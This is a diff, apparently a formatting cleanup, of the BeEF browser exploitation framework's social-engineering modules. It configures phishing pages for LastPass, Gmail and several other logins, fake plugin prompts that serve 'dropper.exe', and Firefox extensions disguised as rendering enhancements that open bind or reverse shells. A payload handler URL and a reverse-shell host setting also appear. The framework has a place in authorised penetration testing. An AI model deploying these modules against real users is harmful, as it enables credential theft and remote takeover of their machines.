BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png') - + + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png') end - end diff --git a/modules/social_engineering/fake_lastpass/module.rb b/modules/social_engineering/fake_lastpass/module.rb index 8518d387c..25b6b468a 100755 --- a/modules/social_engineering/fake_lastpass/module.rb +++ b/modules/social_engineering/fake_lastpass/module.rb @@ -4,14 +4,12 @@ # See the file 'doc/COPYING' for copying permission # class Fake_lastpass < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/core/main/client/lib/jquery-1.12.4.min.js','/lp/jquery','js') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index-new.html','/lp/index','html') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lp_signin_logo.png','/lp/lp_signin_logo','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/cancel.png','/lp/cancel','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/keyboard.png','/lp/keyboard','png') - + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/core/main/client/lib/jquery-1.12.4.min.js', '/lp/jquery', 'js') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index-new.html', '/lp/index', 'html') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lp_signin_logo.png', '/lp/lp_signin_logo', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/cancel.png', '/lp/cancel', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/keyboard.png', '/lp/keyboard', 'png') end # @@ -19,7 +17,7 @@ class Fake_lastpass < BeEF::Core::Command # data back to the framework. # def post_execute - if (@datastore['meta'] == "KILLFRAME") + if @datastore['meta'] == 'KILLFRAME' BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lp_signin_logo.png') @@ -30,5 +28,4 @@ class Fake_lastpass < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification/module.rb index 57a0c0693..128980490 100644 --- a/modules/social_engineering/fake_notification/module.rb +++ b/modules/social_engineering/fake_notification/module.rb @@ -4,17 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Fake_notification < BeEF::Core::Command - def self.options - return [ + [ { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', 'ui_label' => 'Notification text', - 'value' => "This website wants to run the following applet: 'Java' from 'Microsoft Inc'. To continue using this website you must accept the following security popup" - } + 'value' => "This website wants to run the following applet: 'Java' from 'Microsoft Inc'. To continue using this website you must accept the following security popup" } ] end - + # # This method is being called when a zombie sends some # data back to the framework. @@ -24,5 +22,4 @@ class Fake_notification < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/fake_notification_c/module.rb b/modules/social_engineering/fake_notification_c/module.rb index 141b9c3cc..3df225f34 100644 --- a/modules/social_engineering/fake_notification_c/module.rb +++ b/modules/social_engineering/fake_notification_c/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Fake_notification_c < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto @@ -12,16 +11,15 @@ class Fake_notification_c < BeEF::Core::Command beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - return [ - {'name' => 'url', 'ui_label' => 'URL', 'value' => "#{base_host}/dropper.exe", 'width'=>'150px'}, + [ + { 'name' => 'url', 'ui_label' => 'URL', 'value' => "#{base_host}/dropper.exe", 'width' => '150px' }, { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', 'ui_label' => 'Notification text', - 'value' => "Additional plugins are required to display all the media on this page." - } + 'value' => 'Additional plugins are required to display all the media on this page.' } ] end - + # # This method is being called when a zombie sends some # data back to the framework. @@ -31,5 +29,4 @@ class Fake_notification_c < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb index 597a19c8f..9d8710f44 100644 --- a/modules/social_engineering/fake_notification_ff/module.rb +++ b/modules/social_engineering/fake_notification_ff/module.rb @@ -4,23 +4,21 @@ # See the file 'doc/COPYING' for copying permission # class Fake_notification_ff < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto - beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") + beef_host = @configuration.get('beef.http.public') || @configuration.get('beef.http.host') beef_port = @configuration.beef_port url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension" - return [ - {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'}, + [ + { 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width' => '150px' }, { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', 'ui_label' => 'Notification text', - 'value' => "An additional plug-in is required to display some elements on this page." - } + 'value' => 'An additional plug-in is required to display some elements on this page.' } ] end - + # # This method is being called when a zombie sends some # data back to the framework. @@ -30,5 +28,4 @@ class Fake_notification_ff < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/fake_notification_ie/module.rb b/modules/social_engineering/fake_notification_ie/module.rb index b45842737..14e13b9b8 100644 --- a/modules/social_engineering/fake_notification_ie/module.rb +++ b/modules/social_engineering/fake_notification_ie/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Fake_notification_ie < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto @@ -12,16 +11,15 @@ class Fake_notification_ie < BeEF::Core::Command beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - return [ - {'name' => 'url', 'ui_label' => 'URL', 'value' => "#{base_host}/dropper.exe", 'width'=>'150px'}, + [ + { 'name' => 'url', 'ui_label' => 'URL', 'value' => "#{base_host}/dropper.exe", 'width' => '150px' }, { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', 'ui_label' => 'Notification text', - 'value' => "This website wants to run the following applet: 'Java' from 'Microsoft Inc'. To continue using this website you must accept the following security popup" - } + 'value' => "This website wants to run the following applet: 'Java' from 'Microsoft Inc'. To continue using this website you must accept the following security popup" } ] end - + # # This method is being called when a zombie sends some # data back to the framework. @@ -31,5 +29,4 @@ class Fake_notification_ie < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/firefox_extension_bindshell/module.rb b/modules/social_engineering/firefox_extension_bindshell/module.rb index 03d697d3a..78c52c7d3 100644 --- a/modules/social_engineering/firefox_extension_bindshell/module.rb +++ b/modules/social_engineering/firefox_extension_bindshell/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Firefox_extension_bindshell < BeEF::Core::Command - class Bind_extension < BeEF::Core::Router::Router before do headers 'Content-Type' => 'application/x-xpinstall', @@ -14,49 +13,42 @@ class Firefox_extension_bindshell < BeEF::Core::Command end get '/' do - response['Content-Type'] = "application/x-xpinstall" + response['Content-Type'] = 'application/x-xpinstall' extension_path = settings.extension_path print_info "Serving malicious Firefox Extension (Bindshell): #{extension_path}" - send_file "#{extension_path}", - :type => 'application/x-xpinstall', - :disposition => 'inline' + send_file extension_path.to_s, + type: 'application/x-xpinstall', + disposition: 'inline' end end def pre_send - # gets the value configured in the module configuration by the user @datastore.each do |input| - if input['name'] == "extension_name" - @extension_name = input['value'] - end - if input['name'] == "xpi_name" - @xpi_name = input['value'] - end - if input['name'] == "lport" - @lport = input['value'] - end + @extension_name = input['value'] if input['name'] == 'extension_name' + @xpi_name = input['value'] if input['name'] == 'xpi_name' + @lport = input['value'] if input['name'] == 'lport' end mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_bindshell" - extension_path = mod_path + "/extension" + extension_path = "#{mod_path}/extension" # clean the build directory FileUtils.rm_rf("#{extension_path}/build/.", secure: true) # copy in the build directory necessary file, substituting placeholders - File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)} - File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__bindshell_port_placeholder__", @lport)} - File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")} - File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")} + File.open("#{extension_path}/build/install.rdf", 'w') do |file| + file.puts File.read("#{extension_path}/install.rdf").gsub!('__extension_name_placeholder__', @extension_name) + end + File.open("#{extension_path}/build/bootstrap.js", 'w') { |file| file.puts File.read("#{extension_path}/bootstrap.js").gsub!('__bindshell_port_placeholder__', @lport) } + File.open("#{extension_path}/build/overlay.xul", 'w') { |file| file.puts File.read("#{extension_path}/overlay.xul") } + File.open("#{extension_path}/build/chrome.manifest", 'w') { |file| file.puts File.read("#{extension_path}/chrome.manifest") } - extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"] + extension_content = ['install.rdf', 'bootstrap.js', 'overlay.xul', 'chrome.manifest'] # create the XPI extension container xpi = "#{extension_path}/#{@xpi_name}.xpi" - if File.exist?(xpi) - File.delete(xpi) - end + File.delete(xpi) if File.exist?(xpi) Zip::File.open(xpi, Zip::File::CREATE) do |xpi| extension_content.each do |filename| xpi.add(filename, "#{extension_path}/build/#{filename}") @@ -71,16 +63,14 @@ class Firefox_extension_bindshell < BeEF::Core::Command end def self.options - @configuration = BeEF::Core::Configuration.instance - beef_host = @configuration.beef_host - return [ - {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'}, - {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'}, - {'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337'} + [ + { 'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements' }, + { 'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements' }, + { 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/social_engineering/firefox_extension_dropper/module.rb b/modules/social_engineering/firefox_extension_dropper/module.rb index b4cdb862a..11db6bddf 100644 --- a/modules/social_engineering/firefox_extension_dropper/module.rb +++ b/modules/social_engineering/firefox_extension_dropper/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Firefox_extension_dropper < BeEF::Core::Command - class Bind_extension < BeEF::Core::Router::Router before do headers 'Content-Type' => 'application/x-xpinstall', @@ -14,36 +13,31 @@ class Firefox_extension_dropper < BeEF::Core::Command end get '/' do - response['Content-Type'] = "application/x-xpinstall" + response['Content-Type'] = 'application/x-xpinstall' extension_path = settings.extension_path print_info "Serving malicious Firefox Extension (Dropper): #{extension_path}" - send_file "#{extension_path}", - :type => 'application/x-xpinstall', - :disposition => 'inline' + send_file extension_path.to_s, + type: 'application/x-xpinstall', + disposition: 'inline' end end def pre_send - # gets the value configured in the module configuration by the user @datastore.each do |input| - if input['name'] == "extension_name" - @extension_name = input['value'] - end - if input['name'] == "xpi_name" - @xpi_name = input['value'] - end + @extension_name = input['value'] if input['name'] == 'extension_name' + @xpi_name = input['value'] if input['name'] == 'xpi_name' end mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_dropper" - extension_path = mod_path + "/extension" + extension_path = "#{mod_path}/extension" # clean the build directory FileUtils.rm_rf("#{extension_path}/build/.", secure: true) # retrieve the name of the dropper binary Dir.foreach("#{mod_path}/dropper") do |item| - if item != "readme.txt" && item != "." && item != ".." + if item != 'readme.txt' && item != '.' && item != '..' @dropper = item print_info "Using dropper: '#{mod_path}/dropper/#{@dropper}'" end @@ -54,19 +48,17 @@ class Firefox_extension_dropper < BeEF::Core::Command end # copy in the build directory necessary file, substituting placeholders - File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)} - File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)} - File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")} - File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")} + File.open("#{extension_path}/build/install.rdf", 'w') { |file| file.puts File.read("#{extension_path}/install.rdf").gsub!('__extension_name_placeholder__', @extension_name) } + File.open("#{extension_path}/build/bootstrap.js", 'w') { |file| file.puts File.read("#{extension_path}/bootstrap.js").gsub!('__payload_placeholder__', @dropper) } + File.open("#{extension_path}/build/overlay.xul", 'w') { |file| file.puts File.read("#{extension_path}/overlay.xul") } + File.open("#{extension_path}/build/chrome.manifest", 'w') { |file| file.puts File.read("#{extension_path}/chrome.manifest") } FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}" - extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper] + extension_content = ['install.rdf', 'bootstrap.js', 'overlay.xul', 'chrome.manifest', @dropper] # create the XPI extension container xpi = "#{extension_path}/#{@xpi_name}.xpi" - if File.exist?(xpi) - File.delete(xpi) - end + File.delete(xpi) if File.exist?(xpi) Zip::File.open(xpi, Zip::File::CREATE) do |xpi| extension_content.each do |filename| xpi.add(filename, "#{extension_path}/build/#{filename}") @@ -86,14 +78,14 @@ class Firefox_extension_dropper < BeEF::Core::Command beef_host = @configuration.beef_host beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - return [ - {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'}, - {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'}, - {'name' => 'base_host', 'ui_label' => 'Download from', 'value' => base_host, 'width'=>'150px'} + [ + { 'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements' }, + { 'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements' }, + { 'name' => 'base_host', 'ui_label' => 'Download from', 'value' => base_host, 'width' => '150px' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/social_engineering/firefox_extension_reverse_shell/module.rb b/modules/social_engineering/firefox_extension_reverse_shell/module.rb index 37d212464..51533f5e4 100644 --- a/modules/social_engineering/firefox_extension_reverse_shell/module.rb +++ b/modules/social_engineering/firefox_extension_reverse_shell/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Firefox_extension_reverse_shell < BeEF::Core::Command - class Bind_extension < BeEF::Core::Router::Router before do headers 'Content-Type' => 'application/x-xpinstall', @@ -14,52 +13,45 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command end get '/' do - response['Content-Type'] = "application/x-xpinstall" + response['Content-Type'] = 'application/x-xpinstall' extension_path = settings.extension_path print_info "Serving malicious Firefox Extension (Reverse Shell): #{extension_path}" - send_file "#{extension_path}", - :type => 'application/x-xpinstall', - :disposition => 'inline' + send_file extension_path.to_s, + type: 'application/x-xpinstall', + disposition: 'inline' end end def pre_send - # gets the value configured in the module configuration by the user @datastore.each do |input| - if input['name'] == "extension_name" - @extension_name = input['value'] - end - if input['name'] == "xpi_name" - @xpi_name = input['value'] - end - if input['name'] == "lport" - @lport = input['value'] - end - if input['name'] == "lhost" - @lhost = input['value'] - end + @extension_name = input['value'] if input['name'] == 'extension_name' + @xpi_name = input['value'] if input['name'] == 'xpi_name' + @lport = input['value'] if input['name'] == 'lport' + @lhost = input['value'] if input['name'] == 'lhost' end mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_reverse_shell" - extension_path = mod_path + "/extension" + extension_path = "#{mod_path}/extension" # clean the build directory FileUtils.rm_rf("#{extension_path}/build/.", secure: true) # copy in the build directory necessary file, substituting placeholders - File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)} - File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__reverse_shell_port_placeholder__", @lport).gsub!("__reverse_shell_host_placeholder__", @lhost)} - File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")} - File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")} + File.open("#{extension_path}/build/install.rdf", 'w') do |file| + file.puts File.read("#{extension_path}/install.rdf").gsub!('__extension_name_placeholder__', @extension_name) + end + File.open("#{extension_path}/build/bootstrap.js", 'w') do |file| + file.puts File.read("#{extension_path}/bootstrap.js").gsub!('__reverse_shell_port_placeholder__', @lport).gsub!('__reverse_shell_host_placeholder__', @lhost) + end + File.open("#{extension_path}/build/overlay.xul", 'w') { |file| file.puts File.read("#{extension_path}/overlay.xul") } + File.open("#{extension_path}/build/chrome.manifest", 'w') { |file| file.puts File.read("#{extension_path}/chrome.manifest") } - extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"] + extension_content = ['install.rdf', 'bootstrap.js', 'overlay.xul', 'chrome.manifest'] # create the XPI extension container xpi = "#{extension_path}/#{@xpi_name}.xpi" - if File.exist?(xpi) - File.delete(xpi) - end + File.delete(xpi) if File.exist?(xpi) Zip::File.open(xpi, Zip::File::CREATE) do |xpi| extension_content.each do |filename| xpi.add(filename, "#{extension_path}/build/#{filename}") @@ -76,15 +68,15 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host - return [ - {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'}, - {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'}, - {'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '1337'}, - {'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => "#{beef_host}"} + [ + { 'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements' }, + { 'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements' }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '1337' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => beef_host.to_s } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb index 74412afe1..2b27d7fe6 100644 --- a/modules/social_engineering/gmail_phishing/module.rb +++ b/modules/social_engineering/gmail_phishing/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Gmail_phishing < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto @@ -12,33 +11,35 @@ class Gmail_phishing < BeEF::Core::Command beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - xss_hook_url = "#{base_host}/demos/basic.html" - logout_gmail_interval = 10000 - wait_seconds_before_redirect = 1000 - return [ - {'name' => 'xss_hook_url', - 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.', - 'ui_label' => 'XSS hook URI', - 'value' => xss_hook_url, - 'width' => '300px' }, { - 'name' => 'logout_gmail_interval', - 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', - 'ui_label' => 'Gmail logout interval (ms)', - 'value' => logout_gmail_interval, - 'width' => '100px' }, { - 'name' => 'wait_seconds_before_redirect', - 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.', - 'ui_label' => 'Redirect delay (ms)', - 'value' => wait_seconds_before_redirect, - 'width' => '100px' } - ] - end + xss_hook_url = "#{base_host}/demos/plain.html" + logout_gmail_interval = 10_000 + wait_seconds_before_redirect = 1000 + [ + { 'name' => 'xss_hook_url', + 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, ' \ + 'simply leave this field empty, but this means you will loose the hooked browser after executing this module.', + 'ui_label' => 'XSS hook URI', + 'value' => xss_hook_url, + 'width' => '300px' }, { + 'name' => 'logout_gmail_interval', + 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', + 'ui_label' => 'Gmail logout interval (ms)', + 'value' => logout_gmail_interval, + 'width' => '100px' + }, { + 'name' => 'wait_seconds_before_redirect', + 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) ' \ + 'before we redirect to the real Gmail page, so that BeEF gets the credentials in time.', + 'ui_label' => 'Redirect delay (ms)', + 'value' => wait_seconds_before_redirect, + 'width' => '100px' + } + ] + end def post_execute content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/social_engineering/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb index 287e83e15..bca1fe058 100755 --- a/modules/social_engineering/lcamtuf_download/module.rb +++ b/modules/social_engineering/lcamtuf_download/module.rb @@ -4,35 +4,31 @@ # See the file 'doc/COPYING' for copying permission # class Lcamtuf_download < BeEF::Core::Command - # set and return all options for this module def self.options - - return [{ - 'name' => 'real_file_uri', + [{ + 'name' => 'real_file_uri', 'description' => 'The web accessible URI for the real file.', 'ui_label' => 'Real File Path', 'value' => 'http://get.adobe.com/flashplayer/', - 'width' => '300px' - }, - { - 'name' => 'malicious_file_uri', - 'description' => 'The web accessible URI for the malicious file.', - 'ui_label' => 'Malicious File Path', - 'value' => '', 'width' => '300px' - }, - { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore', - 'store_fields' => ['do_once'], 'store_data' => [['false'],['true']], - 'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true - }] + }, + { + 'name' => 'malicious_file_uri', + 'description' => 'The web accessible URI for the malicious file.', + 'ui_label' => 'Malicious File Path', + 'value' => '', + 'width' => '300px' + }, + { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore', + 'store_fields' => ['do_once'], 'store_data' => [['false'], ['true']], + 'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true }] end - def post_execute + def post_execute content = {} - content['result'] = @datastore['result'] - - save content + content['result'] = @datastore['result'] + + save content end - end diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index 36a73f509..9310e42d5 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Pretty_theft < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto @@ -12,21 +11,22 @@ class Pretty_theft < BeEF::Core::Command beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" logo_uri = "#{base_host}/ui/media/images/beef.png" - return [ - {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Windows'],['YouTube'],['Yammer'],['IOS'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, - - {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true }, + [ + { 'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], + 'store_data' => [['Facebook'], ['LinkedIn'], ['Windows'], ['YouTube'], ['Yammer'], ['IOS'], ['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, - {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo (Generic only)', 'value' => logo_uri} + { 'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'], ['Clear']], + 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true }, + + { 'name' => 'imgsauce', 'description' => 'Custom Logo', 'ui_label' => 'Custom Logo (Generic only)', 'value' => logo_uri } ] end - + # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - save({'answer' => @datastore['answer']}) + save({ 'answer' => @datastore['answer'] }) end - end diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb index 5ad28ed36..5c4df19e0 100644 --- a/modules/social_engineering/replace_video_fake_plugin/module.rb +++ b/modules/social_engineering/replace_video_fake_plugin/module.rb @@ -4,16 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Replace_video_fake_plugin < BeEF::Core::Command - def self.options configuration = BeEF::Core::Configuration.instance proto = configuration.beef_proto beef_host = configuration.beef_host beef_port = configuration.beef_port url = "#{proto}://#{beef_host}:#{beef_port}" - return [ - {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'}, - {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'} + [ + { 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => "#{url}/api/ipec/ff_extension", 'width' => '150px' }, + { 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' } ] end @@ -22,5 +21,4 @@ class Replace_video_fake_plugin < BeEF::Core::Command content['Result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb index 954bf8077..2b6f8f5bd 100644 --- a/modules/social_engineering/simple_hijacker/module.rb +++ b/modules/social_engineering/simple_hijacker/module.rb @@ -4,35 +4,34 @@ # See the file 'doc/COPYING' for copying permission # class Simple_hijacker < BeEF::Core::Command - def self.options - config = BeEF::Core::Configuration.instance @templates = config.get('beef.module.simple_hijacker.templates') # Defines which domains to target data = [] - data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'}) - - # We'll then list all templates available + data.push({ 'name' => 'targets', 'description' => 'list domains you want to hijack - separed by ,', 'ui_label' => 'Targetted domains', 'value' => 'beef' }) + + # We'll then list all templates available tmptpl = [] - @templates.each{ |template| + @templates.each do |template| tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js" - raise "Invalid template path for command template #{template}" if not File.exists?(tplpath) - tmptpl<<[ template] - } - - data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"}) - - return data + raise "Invalid template path for command template #{template}" unless File.exist?(tplpath) + + tmptpl << [template] + end + + data.push({ 'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, + 'valueField' => 'tmpl', 'displayField' => 'tmpl', 'mode' => 'local', 'emptyText' => 'Choose a template' }) + + data end - + # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - save({'answer' => @datastore['answer']}) + save({ 'answer' => @datastore['answer'] }) end - end diff --git a/modules/social_engineering/sitekiosk_breakout/module.rb b/modules/social_engineering/sitekiosk_breakout/module.rb index fbfd91873..40fff287f 100644 --- a/modules/social_engineering/sitekiosk_breakout/module.rb +++ b/modules/social_engineering/sitekiosk_breakout/module.rb @@ -4,26 +4,20 @@ # See the file 'doc/COPYING' for copying permission # class Sitekiosk_breakout < BeEF::Core::Command - def pre_send - # gets the value configured in the module configuration by the user @datastore.each do |input| - if input['name'] == "payload_handler" - @payload_handler = input['value'] - end + @payload_handler = input['value'] if input['name'] == 'payload_handler' end - end - def self.options - return [ - {'name' => 'payload_handler', 'ui_label'=>'Payload Handler', 'value' =>'http://10.10.10.10:8080/psh'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + def self.options + [ + { 'name' => 'payload_handler', 'ui_label' => 'Payload Handler', 'value' => 'http://10.10.10.10:8080/psh' } + ] + end + def post_execute + save({ 